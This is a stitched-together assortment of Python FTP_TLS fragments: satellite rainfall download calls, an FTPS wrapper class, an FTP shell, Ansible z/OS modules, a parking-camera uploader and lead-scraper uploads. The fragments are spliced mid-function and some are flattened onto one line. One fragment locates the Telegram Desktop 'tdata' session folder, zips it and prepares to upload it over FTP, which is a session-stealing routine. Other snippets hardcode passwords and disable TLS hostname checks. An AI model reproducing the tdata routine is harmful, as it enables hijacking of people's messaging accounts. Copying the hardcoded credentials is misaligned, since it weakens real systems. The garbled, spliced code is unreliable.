    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S080000-E082959.0480.V06B.zip','903171e42be3ea5c047af5b068233233009bf926')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S083000-E085959.0510.V06B.zip','3b4bfa0bae2a5c19bc65b63ba95abda21922b42b')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S090000-E092959.0540.V06B.zip','dbd013d29b47595bad5ff31899ddc6fa4fd510eb')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S093000-E095959.0570.V06B.zip','072da429e45f9f53c6d0e8d5504df83e014130e9')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S100000-E102959.0600.V06B.zip','b4ca0b5d6eb145684b808776d3c701e9ba9892d2')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S103000-E105959.0630.V06B.zip','b31e48d9126414e707fea6de910277e52b89f749')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S110000-E112959.0660.V06B.zip','00e0b10b118ba3080e68ee52f672569667466a77')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S113000-E115959.0690.V06B.zip','c6a12867db202bb1bf4f9a28eb8a241bf201b320')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S120000-E122959.0720.V06B.zip','cc408441b70a2dfcc8f8407dc5a87ddcede066c2')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S123000-E125959.0750.V06B.zip','4493231149bb793412b1926978510ad5820cfa25')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S130000-E132959.0780.V06B.zip','87c986f2790b8629d3e7694e6277f5f40676c9bf')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S133000-E135959.0810.V06B.zip','178c95370ffc00694ab5bbf529c4d63f4ac725e4')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S140000-E142959.0840.V06B.zip','f4f06605433505d18c592f78e96928ad066958b4')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S143000-E145959.0870.V06B.zip','03a71bc70ba440f952b845c9588afb8a39dc7766')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S150000-E152959.0900.V06B.zip','6442627583596bcd6c41b7ce8422864718fd4621')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S153000-E155959.0930.V06B.zip','1342185a4c6fbd930f59d7a57f15a77b68e16441')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S160000-E162959.0960.V06B.zip','ccdc99282d268761e0a17152464678c6c5752fff')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S163000-E165959.0990.V06B.zip','9573a15b1f9d5cf99472f4d61093645a8bf4b959')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S170000-E172959.1020.V06B.zip','e77a3074a931999a965537f04f888e3ca5533051')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S173000-E175959.1050.V06B.zip','3509e1897fbf9a68ea5d1fbfaa94e6ca34957249')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S180000-E182959.1080.V06B.zip','475ca3ed075d6b9dc9b0743ed5d7579403f68305')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S183000-E185959.1110.V06B.zip','97c14b5ceabbb5768545feae0d413a512c66377a')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S190000-E192959.1140.V06B.zip','dac080f82cbdee41a5b5ae70a6347ab19699c962')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S193000-E195959.1170.V06B.zip','848cbd730bfa8a56efb9b8e33e785374fc4e801e')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S200000-E202959.1200.V06B.zip','4e8854fda21be052927c62bf421f5d6343a880c3')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S203000-E205959.1230.V06B.zip','30c078859d4bfc58bb43399e124ea14ea0f72c73')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S210000-E212959.1260.V06B.zip','19e8cb2d1a66ad7939ecbc7221ab3532149a5f86')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S213000-E215959.1290.V06B.zip','3988b384ee7299f8ebb3538c1a4aedfd0030a817')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S220000-E222959.1320.V06B.zip','6232ddae3206f7a17c72cffbd85b63a207722b92')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S223000-E225959.1350.V06B.zip','0f882a3c9e57678c8418c1746569278964d37b92')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S230000-E232959.1380.V06B.zip','b0f0fb3f9b6786bbe84221503bb8e537cda3f472')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S233000-E235959.1410.V06B.zip','2a4203601af327ef24cd516085efebe4d24bbfc5')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S000000-E002959.0000.V06B.zip','58487d226fa900cefbcec68729f045ffaa1b0a67')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S003000-E005959.0030.V06B.zip','16d902a5a4886c783524711424d8e0add8c35e59')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S010000-E012959.0060.V06B.zip','9c9f0df2d993bcf13e4234dc1e01a6f1476e5973')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S013000-E015959.0090.V06B.zip','0603895a21d847f3e16b2fa38f27c48a192f0e0c')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S020000-E022959.0120.V06B.zip','fe0320929d835ca77096098bdd6513c6bb2ee144')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S023000-E025959.0150.V06B.zip','38a4c677a82abf33b9dc6551d4b7f6597bc06b4c')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S030000-E032959.0180.V06B.zip','93ac35129a9a44ea914f6bad7da22547ce06c841')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S033000-E035959.0210.V06B.zip','11d5cc513bca86045c90fda255421364c64a7a79')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S040000-E042959.0240.V06B.zip','cea37719ff156efbd70aca45db78aa4de100f5d2')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S043000-E045959.0270.V06B.zip','1fe1d26c829d73e61835a413a43bddc26121217d')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S050000-E052959.0300.V06B.zip','8f1fd0b1a169d1dd548fdb4252b4c68124db598f')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S053000-E055959.0330.V06B.zip','fabee236c7a9bccb0ed3dfac3d7957c68518cc64')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S060000-E062959.0360.V06B.zip','08ddd01afbe7638ab46aa145d65a9481b9acf8bd')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S063000-E065959.0390.V06B.zip','610703f508efded5c2e4ef6ee1aaead86b231d45')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S070000-E072959.0420.V06B.zip','4d88394d7fd02b815559e8cffa7012ea21ed7850')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S073000-E075959.0450.V06B.zip','20795a512835e5eabc7cccf8d75638e127e5f89e')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S080000-E082959.0480.V06B.zip','f8d2773c4ca0d687543f598958ed14672595f4ed')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S083000-E085959.0510.V06B.zip','820ee74b264f9f0494b81ae98cbd9b79f3fec453')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S090000-E092959.0540.V06B.zip','58b106a19d8f9741453a22182df41f4b72d44377')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S093000-E095959.0570.V06B.zip','067545336085aab6082b1b8c8b9a9ed3da366d41')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S100000-E102959.0600.V06B.zip','61bcec3de607f5ac3677be7ad630222b9ed6b17b')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S103000-E105959.0630.V06B.zip','5436204fa4db45db75da0bc1bc462f3c4a6350b0')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S110000-E112959.0660.V06B.zip','82241babfcee0941bdb7f41e778485e4c8ad1432')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S113000-E115959.0690.V06B.zip','eb519d7d6f1313da2fe48226855e6b282e60508f')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S120000-E122959.0720.V06B.zip','cfc532ad1da3fbc4c0560332d40656b483a224d2')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S123000-E125959.0750.V06B.zip','7519e9c704037c13b223152176a6886a182173d1')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S130000-E132959.0780.V06B.zip','196b1cf9120e09d5b1c991afbaab46a69513807e')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S133000-E135959.0810.V06B.zip','710a4fa13defa152b047250f90a889c70937f1eb')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S140000-E142959.0840.V06B.zip','35cad97f714f7136fc83bdf6d1e7775a5575cff1')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S143000-E145959.0870.V06B.zip','e4828e406dbe6783b678688d129e50e55a90d294')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S150000-E152959.0900.V06B.zip','d6c2e5ea3d07c2dc6529c526235aebd1c0480be0')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S153000-E155959.0930.V06B.zip','623def2ec9360a86e5028d4e7039d1f26b03dacd')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S160000-E162959.0960.V06B.zip','800355b5064a3a5fef801fb6bf39cbbb5f308ffe')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S163000-E165959.0990.V06B.zip','dbd979c4a2f6fc59a9cffff147c0f66681ff3cbe')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S170000-E172959.1020.V06B.zip','0744f545a3f952971a3d4eea3474a888714ba44a')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S173000-E175959.1050.V06B.zip','1f2ada94a2a535e6cc5798831877b09f70a05703')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S180000-E182959.1080.V06B.zip','6470ee124fce804f4c468363ea1c4a78a0ed09ee')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S183000-E185959.1110.V06B.zip','504d8572c436bfaef3295b3fea47a3ec9740914d')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S190000-E192959.1140.V06B.zip','6f79ce9fb94f6a914d3e1867572ea4172153c1b9')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S193000-E195959.1170.V06B.zip','0503bd087ecd0c514e6c9f6f37cd610ccfbeccae')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S200000-E202959.1200.V06B.zip','40a51c4df1fe8bc606653bbe39c7716fb5e3be3a')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S203000-E205959.1230.V06B.zip','daee0abf507ec6421a2bdbbbcbe008f208b46834')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S210000-E212959.1260.V06B.zip','346a247a7befbded9a16dd981fe606907abf1654')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S213000-E215959.1290.V06B.zip','3ce546f261a16c011adfb20fac91046c7799afad')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S220000-E222959.1320.V06B.zip','96d771d897fcebb211b464c4da0ec71eff8873ea')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S223000-E225959.1350.V06B.zip','45d514bba27fb00e2c815b36b6ececae0db29059')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S230000-E232959.1380.V06B.zip','842d54b61e5afc6a135d5cf946f05b8b0481119c')
    get('/gpmallversions/V06/2015/08/28/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150828-S233000-E235959.1410.V06B.zip','cae3cb42c5f19f46dd59119115b445cd097bbb8a')
    # Transfer complete; close connection
    if ftpConnection:
        ftpConnection.quit()
    # downloadCount / skipCount are presumably maintained by get() — verify.
    print ('Number of files downloaded: '+str(downloadCount))
    if (skipCount>0):
        print ('Number of files already downloaded: '+str(skipCount))
    sys.exit(0)
class Ftps_client:
    """Thin convenience wrapper around ftplib.FTP_TLS (explicit FTPS).

    Connection parameters are stored at construction; login() opens the
    session, and the remaining methods operate on the session held in
    self.Ftp.
    """

    def __init__(self, host, user, pwd, port=21):
        # Store the login parameters; the connection is opened lazily by
        # login().  `port` is kept for interface compatibility but is not
        # used by login(), which connects to the default port.
        self.host = host
        self.port = port
        self.user = user
        self.pwd = pwd
        self.Ftp = None  # live FTP_TLS session once login() has run
        #self._old_makepasv=FTP_TLS.makepasv

    def login(self, debug=2, set_pasv=True):
        """Open the FTPS session and return the underlying FTP_TLS object.

        NOTE(review): this monkey-patches FTP_TLS.makepasv *globally* so
        that the host from the server's PASV reply is replaced with the
        address we actually dialed (works around servers behind NAT that
        advertise an internal IP).  The patch affects every FTP_TLS
        instance in the process.
        """
        _old_makepasv = FTP_TLS.makepasv

        def _new_makepasv(self):
            host, port = _old_makepasv(self)
            # Trust the peer address of the control socket, not the
            # address the server reported.
            host = self.sock.getpeername()[0]
            return host, port

        FTP_TLS.makepasv = _new_makepasv
        self.Ftp = FTP_TLS(self.host)
        self.Ftp.set_debuglevel(debug)
        self.Ftp.auth()
        self.Ftp.login(self.user, self.pwd)
        self.Ftp.makepasv()
        self.Ftp.sendcmd('pbsz 0')  # PBSZ must precede PROT on the control channel
        self.Ftp.set_pasv(set_pasv)
        self.Ftp.prot_p()  # encrypt the data channel
        print("您好 您已经登录 ftp: %s 服务器" % self.host)
        self.Ftp.getwelcome()
        return self.Ftp

    def ftplistDir(self, ftps=None, sever_path="/"):
        """Print the names of the files under sever_path.

        BUG FIX: the original used self.Ftp for cwd() but the separate
        `ftps` argument for nlst(), so listing could silently target a
        different session.  The parameter is kept (now optional) for
        backward compatibility and defaults to the session opened by
        login().
        """
        conn = ftps if ftps is not None else self.Ftp
        # Always start from the root first, otherwise relative paths can
        # resolve against a stale working directory.
        self.Ftp.cwd("/")
        self.Ftp.cwd(sever_path)
        for entry in conn.nlst():
            print(entry)

    def ftpDownloadSeverFile(self, sever_path, sever_file, new_localfile,
                             buffersize=1024):
        """Download sever_file from sever_path into new_localfile (binary)."""
        self.Ftp.cwd("/")
        self.Ftp.cwd(sever_path)
        with open(new_localfile, 'wb') as download_file:
            self.Ftp.retrbinary('RETR %s' % sever_file,
                                download_file.write, buffersize)

    def ftpUploadLocalFile(self, local_filepath, sever_path, new_severfile,
                           buffersize=1024):
        """Upload local_filepath into sever_path as new_severfile.

        new_severfile must be a bare file name, not a path containing
        directories.
        """
        self.Ftp.cwd("/")
        self.Ftp.cwd(sever_path)
        with open(local_filepath, 'rb') as upload_file:
            self.Ftp.storbinary('STOR ' + new_severfile,
                                upload_file, buffersize)
from zipfile import ZipFile from ftplib import FTP_TLS import os, random pathusr = os.path.expanduser('~') teleg = pathusr + '\\AppData\\Roaming\\Telegram Desktop\\tdata' zipp = pathusr + '\\AppData\\Local\\Temp\\tdata.zip' server = '' user = '' pasd = '' ftp = FTP_TLS() ftp.set_debuglevel(2) ftp.connect(server, 21) ftp.sendcmd('USER ' + str(user)) ftp.sendcmd('PASS ' + str(pasd)) try: files1 = os.listdir(teleg) files1 = ' '.join(files1) files2 = os.listdir(teleg + '\D877F783D5D3EF8C') files2 = ' '.join(files2) file1 = findall(r'(D877F783D5D3EF8C\S)', files1) file2 = findall(r'(map\S)', files2) file1 = ''.join(file1) file2 = ''.join(file2) file1 = teleg + '\\' + file1 file2 = teleg + '\\D877F783D5D3EF8C\\' + file2 attch = [] attch.append(file1)
def _shell_connect(host, port, user, passwd, use_ftps):
    """Open and log in an FTP or FTP_TLS connection for shell().

    BUG FIX: the original passed a non-default `port` as the `acct=`
    (account) constructor argument, so the requested port was never used;
    here it is passed to connect() instead.  An empty `user` means
    anonymous login.
    """
    cls = FTP_TLS if use_ftps == "y" else FTP
    if port == "def" or port == "":
        conn = cls(host=host)  # default port 21
    else:
        conn = cls()
        conn.connect(host, int(port))
    if user != "":
        conn.login(user=user, passwd=passwd)
    else:
        conn.login()  # anonymous
    return conn


def shell(host, port, user, passwd, use_ftps):
    """ Shell Mode function. Provides a CLI to interact with FTP server """
    """ Args: host address, port number to connect, user[name] and passw[or]d to login, """
    """ use_ftps - if true use FTPS instead of FTP """
    # Preparation: connect to the server.  The FTP and FTPS code paths were
    # duplicated in the original (and the FTPS path crashed with a NameError
    # by printing ftp.getwelcome()); they are unified here on one `conn`.
    label = "ftps" if use_ftps == "y" else "ftp"
    try:
        conn = _shell_connect(host, port, user, passwd, use_ftps)
        print("Connecting to host '{0}' through port '{1}'... ".format(host, port))
        os.system("echo Entering Shell Mode in 2 seconds")
        os.system("sleep 2")
        os.system("clear")
        print("Server response:\n" + conn.getwelcome())
    except ftplib.all_errors as ex:
        print(color.red + "An error occured while login: {0}".format(ex) + color.std)
        return
    # Enter shell mode: a tiny REPL over the open connection.
    while (1):
        try:
            cmd = input("{0}@{1}~#".format(label, host))
            cmd, arg = parse(cmd)
            if (cmd == "cd"):
                conn.cwd(arg)
            elif (cmd == "exit"):
                conn.quit()
                return
            elif (cmd == "ls"):  # unix's LS without flags support
                print(conn.dir())
            elif (cmd == "cmd"):  # send a command to the server
                conn.sendcmd(arg)
            elif (cmd == "getbin"):  # download file in binary mode
                # BUG FIX: retrbinary requires a data callback; the original
                # called it with the command string only (TypeError).  Save
                # the transfer to a local file named after the last path
                # component of the requested file.
                local_name = arg.split()[-1].rsplit("/", 1)[-1]
                with open(local_name, "wb") as fh:
                    conn.retrbinary(arg, fh.write)
            elif (cmd == "gettxt"):  # download file on text mode
                # retrlines has a default callback that prints each line.
                conn.retrlines(arg)
            elif (cmd == "unknown"):
                print("Unknown command.")
        except ftplib.all_errors as ex:
            print(color.red + "Shell mode error: {0}".format(ex) + color.std)
# version one: # may, 05, 2016 # so, super simple thing to log into an ftp, and issue the command you pass # in the argument # syntax: ./script <command> # the idea is to run this from an eggdrop as a trigger, no fluff from ftplib import FTP_TLS from sys import argv filename, argument = argv ftps = FTP_TLS() #ftps.set_debuglevel(2) # if you broke something, uncomment this (run it directly, not from eggdrop) ftps.connect('your.host', '1111') # enter your server and port within the quotes ftps.login('specialftpuser', 'qwerty') # enter your user and pass within the quotes (remember, not a user with privs) ftps.prot_p() ftps.sendcmd('site ' + argument) # the tcl script i included will take any output from this python and spam # it into the channel.. set this how you like, or turn it off # if you're a tcl guru comment this out and make your tcl do the accounce print "cmd sent, sleeping now zzzz" ftps.quit() quit()
def run_module():
    """Ansible module entry point: query z/OS JES job output over FTP(S).

    Reads connection settings from the environment (FTP_HOST, FTP_PORT,
    FTP_USERID, FTP_PASSWORD, and optional FTP_TLS_VERSION /
    FTP_TLS_CERT_FILE / FTP_SOCKS_PORT) and returns the matching job
    output via module.exit_json.

    Fixes over the original:
    - `result` was referenced in fail_json(**result) before it was ever
      assigned, raising UnboundLocalError instead of the intended failure
      message; it is now initialised up front;
    - misspelled error message "cartificate" -> "certificate".
    """
    module_args = dict(
        job_id=dict(type="str", required=False),
        job_name=dict(type="str", required=False),
        owner=dict(type="str", required=False),
        ddname=dict(type="str", required=False),
    )
    module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
    job_id = module.params.get("job_id")
    job_name = module.params.get("job_name")
    owner = module.params.get("owner")
    ddname = module.params.get("ddname")
    # Must exist before the first fail_json(**result) below.
    result = {}
    if environ.get('FTP_SOCKS_PORT'):
        # Route the FTP control/data sockets through a local SOCKS5 proxy.
        import socks
        import socket
        socks.set_default_proxy(socks.SOCKS5, "127.0.0.1",
                                int(environ.get('FTP_SOCKS_PORT')))
        socket.socket = socks.socksocket
    try:
        if environ.get('FTP_TLS_VERSION'):
            from ftplib import FTP_TLS
            import ssl
            cert_file_path = environ.get('FTP_TLS_CERT_FILE')
            if cert_file_path:
                if not path.isfile(cert_file_path):
                    module.fail_json(
                        msg="The TLS certificate file not found: {0}".format(
                            repr(cert_file_path)), **result)
                context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
                context.load_verify_locations(cert_file_path)
                # Hostname checking is disabled deliberately; the cert file
                # itself is still verified.
                context.check_hostname = False
                ftp = FTP_TLS(context=context)
            else:
                ftp = FTP_TLS()
            tls_version = environ.get('FTP_TLS_VERSION')
            if tls_version == '1.2':
                ftp.ssl_version = ssl.PROTOCOL_TLSv1_2
        else:
            ftp = FTP()
        ftp.connect(environ.get('FTP_HOST'),
                    int(environ.get('FTP_PORT') or 21))
        ftp.login(environ.get('FTP_USERID'), environ.get('FTP_PASSWORD'))
        ftp.sendcmd("site filetype=jes")  # switch the server into JES mode
        ftp.set_pasv(True)
        if environ.get('FTP_TLS_VERSION'):
            ftp.prot_p()  # encrypt the data channel
    except Exception as e:
        module.fail_json(
            msg="An unexpected error occurred during FTP login: {0}".format(
                repr(e)), **result)
    if not job_id and not job_name and not owner:
        module.fail_json(msg="Please provide a job_id or job_name or owner")
    try:
        wait_time_s = 10
        result["jobs"] = job_output(ftp, wait_time_s, job_id, owner,
                                    job_name, ddname)
        result["changed"] = False
    except Exception as e:
        module.fail_json(msg=repr(e))
    module.exit_json(**result)
lprcode = "No Plate" lpr_filepath = '' ftp_file_case = '' # variables for image url compared_option = 0 # 0 - no, 1 - log table, 2 - ticket table compared_value = '' # compared, 1 - vehicle id , 2 -barcode while 1: relay_status = relay_status & (~DENYLED) bus.write_byte_data(I2C_ADDRESS, 0x09, relay_status) # GPIO.output(DENYLED, GPIO.LOW) # FTP if lpr_filepath != '': try: ftp = FTP_TLS('192.168.0.200') ftp.sendcmd('USER vlada') ftp.sendcmd('PASS raspberry2018') timestamp = "%04d%02d%02d" % (datetime.datetime.now().year, datetime.datetime.now().month, datetime.datetime.now().day) try: ftp.cwd('/PARKING_08_iz/' + timestamp) except Exception as ex: ftp.mkd('/PARKING_08_iz/' + timestamp) ftp.cwd('/PARKING_08_iz/' + timestamp) lpr_file = open(DIR_PATH + lpr_filepath, 'rb') print("To ftp: " + timestamp + '/' + ftp_file_case) ftp.storbinary('STOR ' + ftp_file_case, lpr_file) ftp.quit() ftp.close()
leads_with_keywords[current_url_number].append({'title':this_title}) leads_with_keywords[current_url_number].append({'url':this_url}) current_url_number+=1 break current_lead_number+=1 with open('out_lead.json', 'w') as outfile: json.dump(leads_with_keywords, outfile) exit ftp=FTP_TLS() ftp.set_debuglevel(2) ftp.connect('0000', 0000) ftp.sendcmd("USER user") ftp.sendcmd("PASS user") file = open('out_lead.json','rb') ftp.storbinary('STOR out_lead.json', file) file.close() ftp.close() os.remove("lead.json") os.remove("out_lead.json") # Because another file is created which is out_lead.json # Watchdog runs the clean_leads script again. # But because there is no lead.json because spider.py hasen't # It throws a missing file error. # Currently this is fine for now.
def run_module():
    """Ansible module entry point: run TSO command(s) on z/OS over FTP (JES).

    Connection settings come from environment variables: FTP_HOST,
    FTP_PORT (default 21), FTP_USERID, FTP_PASSWORD, plus optional
    FTP_TLS_VERSION / FTP_TLS_CERT_FILE for TLS and FTP_SOCKS_PORT for a
    local SOCKS5 proxy.  The ``commands`` parameter is passed to
    ``run_tso_command``; the module fails if any command reports a
    non-zero ``rc``, otherwise exits with ``changed=True``.
    """
    module_args = dict(commands=dict(type="raw", required=True,
                                     aliases=["command"]), )
    module = AnsibleModule(argument_spec=module_args,
                           supports_check_mode=True)
    # Initialized up front so the fail_json(**result) calls below always
    # have a dict to splat, even before any command has run.
    result = dict(changed=False, )
    commands = module.params['commands']

    # Optionally tunnel the whole FTP session through a local SOCKS5 proxy.
    if environ.get('FTP_SOCKS_PORT'):
        import socks
        import socket
        socks.set_default_proxy(socks.SOCKS5, "127.0.0.1",
                                int(environ.get('FTP_SOCKS_PORT')))
        socket.socket = socks.socksocket

    try:
        if environ.get('FTP_TLS_VERSION'):
            from ftplib import FTP_TLS
            import ssl
            cert_file_path = environ.get('FTP_TLS_CERT_FILE')
            if cert_file_path:
                if not path.isfile(cert_file_path):
                    module.fail_json(
                        msg="Certification file not found: {0}".format(
                            repr(cert_file_path)), **result)
                context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
                context.load_verify_locations(cert_file_path)
                # NOTE(review): hostname verification is disabled —
                # presumably the host is addressed by IP; confirm intended.
                context.check_hostname = False
                ftp = FTP_TLS(context=context)
            else:
                ftp = FTP_TLS()
            tls_version = environ.get('FTP_TLS_VERSION')
            if tls_version == '1.2':
                ftp.ssl_version = ssl.PROTOCOL_TLSv1_2
        else:
            # No TLS requested: plain FTP.
            ftp = FTP()
        ftp.connect(environ.get('FTP_HOST'),
                    int(environ.get('FTP_PORT') or 21))
        ftp.login(environ.get('FTP_USERID'), environ.get('FTP_PASSWORD'))
        ftp.sendcmd("site filetype=jes")  # switch the server into JES mode
        ftp.set_pasv(True)
        if environ.get('FTP_TLS_VERSION'):
            ftp.prot_p()  # encrypt the data channel as well
    except Exception as e:
        module.fail_json(
            msg="An unexpected error occurred during FTP login: {0}".format(
                repr(e)), **result)

    try:
        result = run_tso_command(ftp, commands, module)
        ftp.quit()
        # Fail fast on the first command whose return code is non-zero.
        for cmd in result.get("output"):
            if cmd.get("rc") != 0:
                module.fail_json(msg='The TSO command "' +
                                 cmd.get("command", "") +
                                 '" execution failed.', **result)
        result["changed"] = True
        module.exit_json(**result)
    except Exception as e:
        # Best-effort cleanup of the control connection before failing.
        ftp.quit()
        module.fail_json(msg="An unexpected error occurred: {0}".format(
            repr(e)), **result)
# Fragment of a second lead-scraping post-processing script (out2 variant):
# records each matched lead's title/url into `leads_with_keywords`, dumps the
# dict to out2_lead.json, uploads it over FTPS, then removes the local files.
# NOTE(review): this unit is truncated — `title = lead[0]`, the `break`, and
# the counter increments belong to enclosing loops whose headers are outside
# this view, so the code is documented in place, not restructured.
# NOTE(review): bare `exit` is a no-op expression (not called) — presumably
# `exit()` was meant.
# NOTE(review): connect('0000', 0000) and the USER/PASS strings look like
# placeholders; raw sendcmd() login also skips FTP_TLS's prot_p()
# data-channel protection — confirm the real host/credentials handling.
